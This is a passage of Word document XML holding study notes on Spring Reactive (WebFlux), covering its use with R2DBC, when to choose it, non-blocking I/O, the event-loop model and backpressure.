          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Servlet 3.1+</w:t>
      </w:r>
      <w:r w:rsidRPr="00624104">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00624104">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Tomcat</w:t>
      </w:r>
      <w:r w:rsidRPr="00624104">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44407CE3"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sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Can use with </w:t>
      </w:r>
      <w:r w:rsidRPr="00624104">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>R2DBC</w:t>
      </w:r>
      <w:r w:rsidRPr="00624104">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for reactive DB access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7903D9F7" w14:textId="77777777" w:rsidR="00484F17" w:rsidRPr="00624104" w:rsidRDefault="00000000" w:rsidP="0062410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70F49F1">
          <v:rect id="_x0000_i2194" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="23CDE034" w14:textId="77777777" w:rsidR="00484F17" w:rsidRPr="00624104" w:rsidRDefault="00484F17" w:rsidP="00624104">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00624104">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>🚀</w:t>
      </w:r>
      <w:r w:rsidRPr="00624104">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> When to Use Spring Reactive?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C1EEDF4"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sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">When your application needs </w:t>
      </w:r>
      <w:r w:rsidRPr="00624104">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>high concurrency</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="399B72EC"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sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">You want to build </w:t>
      </w:r>
      <w:r w:rsidRPr="00624104">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>event-driven</w:t>
      </w:r>
      <w:r w:rsidRPr="00624104">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> microservices</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B9493F0"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sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">You’re using </w:t>
      </w:r>
      <w:r w:rsidRPr="00624104">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>streaming data</w:t>
      </w:r>
      <w:r w:rsidRPr="00624104">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00624104">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>WebSockets</w:t>
      </w:r>
      <w:r w:rsidRPr="00624104">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, or </w:t>
      </w:r>
      <w:r w:rsidRPr="00624104">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>reactive DBs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DFC2D9D" w14:textId="77777777" w:rsidR="00484F17" w:rsidRPr="00624104" w:rsidRDefault="00484F17" w:rsidP="00624104">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00624104">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Let me know if you want a working sample or compare WebFlux with traditional Spring MVC in code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CFF0A4F" w14:textId="77777777" w:rsidR="00484F17" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00484F1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39CAA08">
          <v:rect id="_x0000_i2195" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F3B3577" w14:textId="77777777" w:rsidR="00484F17" w:rsidRPr="00CE4B95" w:rsidRDefault="00484F17" w:rsidP="00484F17">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="483" w:name="_Toc196307963"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Why should we use Spring reactive?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="483"/>
    </w:p>
    <w:p w14:paraId="25747CD1" w14:textId="25E9BE10" w:rsidR="00163F3B" w:rsidRPr="00260A37" w:rsidRDefault="00163F3B" w:rsidP="00260A37">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00260A37">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">We use </w:t>
      </w:r>
      <w:r w:rsidRPr="00260A37">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Spring Reactive (Spring WebFlux)</w:t>
      </w:r>
      <w:r w:rsidRPr="00260A37">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to build </w:t>
      </w:r>
      <w:r w:rsidRPr="00260A37">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>scalable, efficient, and resilient</w:t>
      </w:r>
      <w:r w:rsidRPr="00260A37">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> applications that handle </w:t>
      </w:r>
      <w:r w:rsidRPr="00260A37">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>high concurrency</w:t>
      </w:r>
      <w:r w:rsidRPr="00260A37">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> with minimal resource consumption.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00E523C3" w14:textId="77777777" w:rsidR="00163F3B" w:rsidRPr="00260A37" w:rsidRDefault="00000000" w:rsidP="00260A3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B3696AB">
          <v:rect id="_x0000_i2196" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7199AE67" w14:textId="77777777" w:rsidR="00163F3B" w:rsidRPr="00260A37" w:rsidRDefault="00163F3B" w:rsidP="00260A37">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00260A37">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>✅</w:t>
      </w:r>
      <w:r w:rsidRPr="00260A37">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Why Use Spring Reactive?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FC498F6" w14:textId="77777777" w:rsidR="00163F3B" w:rsidRPr="00260A37" w:rsidRDefault="00163F3B" w:rsidP="00260A37">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00260A37">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>1. Non-blocking I/O</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="242CD7D5" w14:textId="77777777" w:rsidR="00163F3B" w:rsidRPr="00260A37" w:rsidRDefault="00163F3B" w:rsidP="00260A37">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00260A37">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>It doesn't block threads while waiting for data (e.g., DB, API response).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6760BE46" w14:textId="77777777" w:rsidR="00163F3B" w:rsidRPr="00260A37" w:rsidRDefault="00163F3B" w:rsidP="00260A37">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00260A37">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Threads stay free to serve other requests.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0570709B" w14:textId="77777777" w:rsidR="00163F3B" w:rsidRPr="00260A37" w:rsidRDefault="00163F3B" w:rsidP="00260A37">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00260A37">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>📌</w:t>
      </w:r>
      <w:r w:rsidRPr="00260A37">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Example: While waiting for DB response, the same thread can serve other requests.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="459C905F" w14:textId="77777777" w:rsidR="00163F3B" w:rsidRPr="00260A37" w:rsidRDefault="00000000" w:rsidP="00260A3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83F25AA">
          <v:rect id="_x0000_i2197" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="225B70D8" w14:textId="77777777" w:rsidR="00163F3B" w:rsidRPr="00260A37" w:rsidRDefault="00163F3B" w:rsidP="00260A37">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00260A37">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>2. Handles High Load with Fewer Threads</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2904CA43" w14:textId="77777777" w:rsidR="00163F3B" w:rsidRPr="00260A37" w:rsidRDefault="00163F3B" w:rsidP="00260A37">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00260A37">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Uses an </w:t>
      </w:r>
      <w:r w:rsidRPr="00260A37">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>event-loop model</w:t>
      </w:r>
      <w:r w:rsidRPr="00260A37">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (like Node.js).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37D0443B" w14:textId="77777777" w:rsidR="00163F3B" w:rsidRPr="00260A37" w:rsidRDefault="00163F3B" w:rsidP="00260A37">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00260A37">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Efficient under </w:t>
      </w:r>
      <w:r w:rsidRPr="00260A37">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>massive concurrent connections</w:t>
      </w:r>
      <w:r w:rsidRPr="00260A37">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (e.g., thousands of users).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BD667BF" w14:textId="77777777" w:rsidR="00163F3B" w:rsidRPr="00260A37" w:rsidRDefault="00000000" w:rsidP="00260A3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994DB3A">
          <v:rect id="_x0000_i2198" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B56DBD5" w14:textId="77777777" w:rsidR="00163F3B" w:rsidRPr="00260A37" w:rsidRDefault="00163F3B" w:rsidP="00260A37">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00260A37">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>3. Better Performance and Resource Utilization</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E3C653A" w14:textId="77777777" w:rsidR="00163F3B" w:rsidRPr="00260A37" w:rsidRDefault="00163F3B" w:rsidP="00260A37">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00260A37">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>More responsive under load compared to traditional (blocking) apps.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E043CCE" w14:textId="77777777" w:rsidR="00163F3B" w:rsidRPr="00260A37" w:rsidRDefault="00163F3B" w:rsidP="00260A37">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00260A37">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Uses less memory and CPU.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="039DA9C5" w14:textId="77777777" w:rsidR="00163F3B" w:rsidRPr="00260A37" w:rsidRDefault="00000000" w:rsidP="00260A3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EAB0C46">
          <v:rect id="_x0000_i2199" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="528692A7" w14:textId="77777777" w:rsidR="00163F3B" w:rsidRPr="00260A37" w:rsidRDefault="00163F3B" w:rsidP="00260A37">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00260A37">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>4. Backpressure Support</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FB4F154" w14:textId="77777777" w:rsidR="00163F3B" w:rsidRPr="00260A37" w:rsidRDefault="00163F3B" w:rsidP="00260A37">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00260A37">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Uses </w:t>
      </w:r>
      <w:r w:rsidRPr="00260A37">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Reactive Streams</w:t>
      </w:r>
      <w:r w:rsidRPr="00260A37">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to control the data flow rate between producers and consumers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B9AE322" w14:textId="77777777" w:rsidR="00163F3B" w:rsidRPr="00260A37" w:rsidRDefault="00000000" w:rsidP="00260A3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302A8DB">
          <v:rect id="_x0000_i2200" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
